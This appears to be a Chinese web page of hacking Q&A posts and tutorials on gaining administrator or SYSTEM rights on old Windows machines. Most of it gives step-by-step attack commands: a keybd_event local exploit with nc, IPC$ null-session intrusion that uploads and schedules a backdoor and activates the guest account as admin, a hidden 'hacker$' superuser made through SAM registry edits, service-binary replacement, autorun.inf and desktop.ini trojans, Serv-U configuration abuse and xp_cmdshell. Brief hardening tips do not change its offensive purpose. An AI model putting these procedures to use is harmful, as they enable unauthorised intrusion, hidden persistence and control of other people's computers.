怎么样才能获得root权限
root是Linux和unix系统中的超级管理员用户帐户,该帐户拥有整个系统至高无上的权力,所有对象他都可以操作,所以很多黑客在入侵系统的时候,都要把权限提升到root权限,用windows的方法理解也就是将自己的非法帐户添加到Administrators用户组。 Administrator是Windows NT内核系统中的超级管理员用户帐户,也拥有极高的权限,而SYSTEM用户组可以理解为计算机系统自身的权限。可以操作一切对象,对一切进程进行操作。手机连接电脑用360下个360手机助,手机连接电脑的360手机助手搜下一键ROOT (5~6个一键ROOT逐一试过即可)即可获取
如何提升漏洞权限
在user下用以下命令进行权限升级:
net localgroup administrators USER /add
其中,USER为你当前要用的用户名。
因为设计缺陷,Windows桌面应用程序处理通过keybd_event() function函数发送的键盘事件时存在溢出错误,攻击者可以通过向以更高权限运行的桌面应用程序(如explorer.exe)发送恶意的键盘事件,使用管理员权限执行任意代码。这一漏洞可以使一个普通用户权限的账户使用管理员权限对系统进行任意操作。该漏洞影响的系统:Windows 2000,Windows XP,Windows2003。
准备好入侵工具
pulist:一款进程PID查看器,可以在命令提示符下查看当前系统进程的PID值。 keybd:键盘事件权限提升漏洞的溢出工具,通过它可以取得系统管理员权限。 nc:黑客入侵的“瑞士军刀”,系统端口监听利器,功能相当强大。
入侵过程
一、获得进程PID值
根据漏洞特点,我们需要获取一个桌面应用程序(如explorer.exe)的进程PID值。在系统的“任务管理器”中,我们是看不到进程的PID值的,所以我们需要借助一款可以查看系统进程PID值的小工具——pulist。在“命令提示符”中运行“pulist.exe”,即可显示当前系统进程的PID值,我们在其中找到“explorer.exe”进程的PID,这里是“1716”(如图)。
此主题相关图片如下:
小知识:进程的PID值指的是代表各进程的ID值。PID就是对各进程的身份标志,每个进程都有自己唯一的PID值。
二、提升账户权限
信息收集完毕,我们使用一个名为“888”的普通用户权限账户进行漏洞测试。我们运行“命令提示符”,输入“runas /user:888 cmd.exe”这个命令的意思是以用户“888”的权限运行一个命令提示符窗口,回车后系统会出现一个新的命令提示符窗口,其窗口标题为“cmd.exe(运行为888)”。这个命令提示符中我们的权限只是普通用户级别的,很多操作不能进行,例如添加删除用户等。当试图用该账户进行用户的添加删除操作时将会出现错误。
将下载回来的漏洞利用程序keybd解压到某个目录中,例如“c:”。此外我们还要用到远程监听工具nc,将它与keybd放在同一目录中。在命令提示符中进入keybd所在的文件夹,输入命令 “keybd.exe 1716”。回车,这时系统会跳出一个新的命令提示符窗口,表示keybd.exe已经溢出成功。
小提示:溢出时要保证系统的默认输入法为“英文”,否则将会使溢出失败。
溢出成功后,就该nc出马了。在命令提示符中进入nc所在的目录,然后输入“nc -vv localhost 65535”,回车后便出现了欢迎界面。这表示888账户已经获得管理员权限。我们接着输入“net user piao 123456 /add”新建一个账户名为piao,密码为123456的用户。然后输入“net localgroup administrators piao /add”,将账户piao加入系统的管理员组。这两个只有管理员权限才可以执行的命令都可以成功完成,入侵成功。
小提示:我们获取的管理员权限依赖于执行“keybd.exe”后弹出的命令提示符窗口,如果把这个弹出的命令提示符窗口关闭,以888账户运行的命令提示符会立刻回到普通用户权限,所以在执行命令的时候一定不可以将之关闭。
危害虽小,仍须防范
由于该漏洞是因为本地系统设计上的缺陷造成的,所以只能用于本地用户的权限提升,而且必须是本地登录的用户。但是不管漏洞如何之小,存在肯定会对系统造成严重的安全隐患,我们还是要修复漏洞,以防别有用心之人。
要利用漏洞就需要使用到“命令提示符”,我们可以通过限制“命令提示符”的运行权限使攻击者无从下手。首先在资源管理器中点击“工具”按钮,选择“文件夹选项”,切换到“查看”标签,去掉“使用简单文件共享(推荐)”前面的钩,这一步是为了让文件的属性菜单中显示“安全”标签。然后我们进入“c:windowssystem32”,找到“cmd.exe”,点右键选择“属性”,切换到“安全”标签,将其中“组或用户名称”中除了管理员外的所有用户都删除,完成后点“确定”,这样当普通用户想运行“命令提示符”的时候将会出现“拒绝访问”的警告框
提高本机权限(黑客请进)
能给你电脑用用就不错了!
提高了用户的权限后你想干什么?
从你的描述来看,基本没有办法了。
黑客DOS命令或其它命令入侵他人电脑的具体步骤?
IPC$入侵
一 唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
怎么样在受限用户下提升至管理员权限???
用管理员账户登陆系统才能给其他用户更改权限,如果你没有管理员帐号,可以尝试下面的方法:
建一个批处理文件
net
user
admin1
1234
/add
net
localgroup
administrators
admin1
/add
另存为admin1.bat在桌面上.
然后运行输入gpedit.msc打开组策略,计算机配置-Windows配置-脚本启动在右侧面版上双击启动然后添加桌面的admin1.bat进启动项.然后重起电脑..
这样我们重起后就可以得到一个帐号admin1密码1234的管理员帐号拉..
有的电脑上不能进gpedit.msc,这时我们还有个办法,运行mmc.exe看到控制台,然后点文件,添加删除管理单元-添加,找到组策略对象编辑器,然后添加-完成.这样就也建立了一个组策略了.
nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net
user
hacker$Content$nbsp;1234
/add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输入"regedit.exe"
回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net
user
hacker$Content$nbsp;/del将用户hacker$删除:net
user
hacker$Content$nbsp;/del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net
user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net
user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
被黑客黑了电脑的最高管理员权限怎么解,w7 64位
可以破解的,方法
1.用光盘或者安装系统的U盘进入到PE里面然后清除密码
2.用另外一台电脑下载之前打开电脑就上锁的文件,用TXT打开搜索net user就能找到那条设置密码的命令从而找到密码
3.最简单最傻的方法直接光盘重新装系统
4.把原文件(就是你打开电脑就被上锁的文件)提供给我,我帮你弄132150-8505 20元,并且告诉你原理
5.交钱给那个写敲竹杠木马的小朋友
本地电脑如何提升GUEST的权限
Guest权限提升方法总结:
现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)
但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的guest权限,于是,如何拿到系统管理员或者是system权限,便显得日益重要了。
于是,我就总结了一下大家所经常使用的几种提升权限的方法,以下内容是我整理的,没有什么新的方法,写给和我一样的菜鸟看的。高手们就可以略去了,当然,你要复习我不反对,顺便帮我查查有什么补充与修改:
1、社会工程学。
对于社会工程学,我想大家一定不会陌生吧?(如果你还不太明白这个名词的话,建议你去找一些相关资料查查看。)我们通常是通过各种办法获得目标的敏感信息,然后加以分析,从而可以推断出对方admin的密码。举一个例子:假如我们是通过对服务器进行数据库猜解从而得到admin在网站上的密码,然后借此上传了一个海洋顶端木马,你会怎么做?先翻箱倒柜察看asp文件的代码以希望察看到连接SQL的帐号密码?错错错,我们应该先键入一个netstat –an命令察看他开的端口(当然用net start命令察看服务也行)。一旦发现他开了3389,犹豫什么?马上拿出你的终端连接器,添上对方IP,键入你在他网站上所获得的用户名及密码……几秒之后,呵呵,进去了吧?这是因为根据社会工程学的原理,通常人们为了记忆方便,将自己在多处的用户名与密码都是用同样的。于是,我们获得了他在网站上的管理员密码,也就等同于获得了他所有的密码。其中就包括系统admin密码。于是我们就可以借此登入他的3389拉!
即使他并没有开启3389服务,我们也可以凭借这个密码到他的FTP服务器上试试,如果他的FTP服务器是serv-u 5.004 以下版本,而帐号又具有写权限,那么我们就可以进行溢出攻击了!这可是可以直接拿到system权限的哦!(利用serv-u还有两个提升权限的方法,
我待会儿会说的)
实在不行,我们也可以拿它的帐号去各大网站试试!或许就能进入他所申请的邮箱拿到不少有用的信息!可以用来配合我们以后的行动。
还有一种思路,我们知道,一个网站的网管通常会将自己的主页设为IE打开后的默认主页,以便于管理。我们就可以利用这一点,将他自己的主页植上网页木马……然后等他打开IE……呵呵,他怎么也不会想到自己的主页会给自己种上木马吧?
其实利用社会工程学有很多种方法,想作为一个合格黑客,这可是必学的哦!多动动你自己的脑子,你才会成功!
2、本地溢出。
微软实在是太可爱了,这句话也不知是哪位仁兄说的,真是不假,时不时地就会给我们送来一些溢出漏洞,相信通过最近的MS-0011大家一定又赚了一把肉鸡吧?其实我们在拿到了Guest权限的shell后同样可以用溢出提升权限。最常用的就是RunAs.exe、 winwmiex.exe 或是PipeUpAdmin等等。上传执行后就可以得到Admin权限。但一定是对方没有打过补丁的情况下才行,不过最近微软的漏洞一个接一个,本地提升权限的exploit也会出来的,所以大家要多多关心漏洞信息,或许下一个exploit就是你写出来的哦!
3、利用scripts目录的可执行权限。
这也是我们以前得到webshell后经常使用的一招,原理是Scripts目录是IIS下的可运行目录,权限就是我们梦寐以求的SYSTEM权限。常见的使用方法就是在U漏洞时代我们先上传idq.dll到IIS主目录下的Scripts目录,然后用ispc.exe进行连接,就可以拿到system权限,不过这个是在Microsoft出了SP3之后就行不通了,其实我们仍可以利用此目录,只要我们上传别的木马到此目录,我举个例子就比如是winshell好了。然后我们在IE中输入:
http://targetIP/Scripts/木马文件名.exe
等一会,看到下面进度条显示“完成”时,可以了,连接你设定的端口吧!我这里是默认的5277,连接好后就是SYSTEM权限了!这时你要干什么我就管不着了……嘿嘿
4、替换系统服务。
这可是广大黑友乐此不疲的一招。因为windows允许对正在运行中的程序进行改动,所以我们就可以替换他的服务以使得系统在重启后自动运行我们的后门或是木马!首先,通过你获得的guest权限的shell输入:net start命令,察看他所运行的服务。此时如果你对windows的系统服务熟悉的话,可以很快看出哪些服务我们可以利用。
C:WINNTSystem32net start
已经启动以下 Windows 服务:
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Logical Disk Manager Administrative Servic
Network Connections
Network Location Awareness (NLA)
Protected Storage
Remote Procedure Call (RPC)
Rising Process Communication Center
Rising Realtime Monitor Service
Secondary Logon
Security Accounts Manager
Shell Hardware Detection
System Event Notification
System Restore Service
Telephony
Themes
Upload Manager
WebClient
Windows Audio
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
命令成功完成。
CCenter.exe,而Rising Realtime Monitor Service服务调用的是RavMonD.exe。这些都是第三方服务,可以利用。(强烈推荐替换第三方服务,而不要乱动系统服务,否则会造成系统不稳定)于是我们搜索这两个文件,发现他们在D: risingrav文件夹中,此时注意一点:如果此文件是在系统盘的Program Files目录中时,我们要知道,如果对方是使用的NTFS格式的硬盘,那么系统盘下的这个文件夹guest权限是默认不可写的,还有Windows目录、Documents and Settings目录这些都是不可写的,所以我们就不能替换文件,只能令谋途径了。(这也是为什么我不建议替换系统服务的原因之一,因为系统服务文件都在WindowsSystem32目录中,不可写)但如果是FAT32格式就不用担心,由于它的先天不足,所有文件夹都是可写的。
于是就有人会问:如果是NTFS格式难道我们就没辙了吗?
当然不是,NTFS格式默认情况下除了对那三个文件夹有限制外,其余的文件夹、分区都是everyone完全控制。(也就是说我即使是IPC$的匿名连接,都会对这些地方有可写可运行权限!)所以一旦对方的第三方服务不是安装在那三个文件夹中,我们就可以替换了!我就拿CCenter下手,先将它下载到本地机器上(FTP、放到IIS主目录中再下载等等……)然后拿出你的文件捆绑机,找到一个你最拿手的后门……呵呵,捆绑好后,上传,先将对方的CCenter.exe文件改个名CCENTBAK.exe,然后替换成自己的CCenter。现在只需要等对方的机器重启,我们的后门就可以运行了!由于Windows系统的不稳定,主机在一个礼拜后就会重启,(当然如果你等不及的话,可以对此服务器进行DDOS攻击迫使他重启,但我并不赞同!)此时登上你的后门,就是System权限了!
5、替换admin常用程序。
如果对方没有你所能利用的服务,也可以替换对方管理员常用的程序,例如QQ,MSN等等,具体替换方法与替换服务一样,只是你的后门什么时候可以启动就得看你的运气了。
6、利用autorun .inf或desktop.ini。
我们常会碰到这种事:光盘放进光驱,就会自动跳出来一段FLASH,这是为什么?呵呵,你到光盘的根目录中看看,是否有一个autorun.inf的文件?用记事本打开来看看,是不是有这么一句话:autorun=xxx.exe 这就是你刚才所看到的自动运行的程序了。
于是我们就可以利用这个来提升我们的权限。先配置好一个后门,(我常用的是winshell,当然你不用这个也行)上传到他D盘下的任意一个文件夹中,然后从你那个自运行的光盘中把autorun.inf文件也上传,不过上传前先将autorun=xxx.exe 后面的xxx.exe改为你配置的后门文件途径、文件名,然后再上传到d盘根目录下,加上只读、系统、隐藏属性。OK就等对方admin浏览D盘,我们的后门就可以启动了!(当然,这必须是在他没有禁止自动运行的情况下才行。)
另外有相同作用的是desktop.ini。大家都知道windows支持自定义文件,其实它就是通过在文件夹中写入特定文件——desktop.ini与Folder.htt来实现的,我们就可以利用修改这文件来达到我们的目的。
首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”
/OBJECT
然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门!(如果你不放心,可以多设置几个目录)
7、Serv-U提升权限
利用Serv-U提升权限共有三种方法,溢出是第一种,我之前已经说过,这里就不介绍了。我要讲的是其余两种办法。
办法一:要求:对Serv-u安装目录有完全控制权。
方法:进入对方的Serv-U目录,察看他的ServUDaemon.ini,这是Serv-U的配置文件,如果管理员没有选择将serv- u的所有配置写入注册表的话,我们就可以从这个文件中看到Serv-U的所有信息,版本、IP、甚至用户名与密码!早些版本的密码是不加密的,但是后来是经过了MD5加密。所以不能直接得到其密码。不过我们仍然有办法:先在本地安装一个Serv-U(版本最好新点),将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了。我们新建一个用户,什么组不重要,重要的是将他的主目录改为对方的系统盘,然后加上执行权限!这个最重要。更改完后应用,退出。再将你更改过的ServUDaemon.ini 文件上传,覆盖掉他的文件,然后就等他的Serv-U重启更新配置,之后我们就可以登入他的FTP。进入后执行以下命令:
Cd windows
Cd System32
Quote site exec net.exe user wofeiwo /add
Quote site exec net.exe localgroup administrators wofeiwo /add
Bye
然后你就有了一个叫wofeiwo的系统管理员了,还等什么?登陆3389,大功告成!
办法二:Serv-u开了两个端口,一个是21,也就是FTP了,而另一个是43958,这个端口是干什么的?嘿嘿,这个是Serv-U的本地管理端口。但是默认是不准除了127.0.0.1外的ip连接的,此时就要用到FPIPE.exe文件,这是一个端口转发程序,上传他,执行命令:
Fpipe –v –l 3333 –r 43958 127.0.0.1
意思是将4444端口映射到43958端口上。
然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了,之后提升权限的方法参考办法一。我就不赘述了。
8、SQL帐户密码泄露。
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号,因为MSSQL是默认的SYSTEM权限。
要求:你得到了对方MSSQL管理员密码(可以从他的连接数据库的ASP文件中看到),对方没有删除xp_cmdshell
方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。Format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了。
唔……升个懒腰,好累阿,终于写完8个方法了,发发牢骚……(以下省略N字符)
总之,以上的8种方法并不是绝对的,最主要的是你的思路,每种方法互相结合,才能发挥其应有的效应。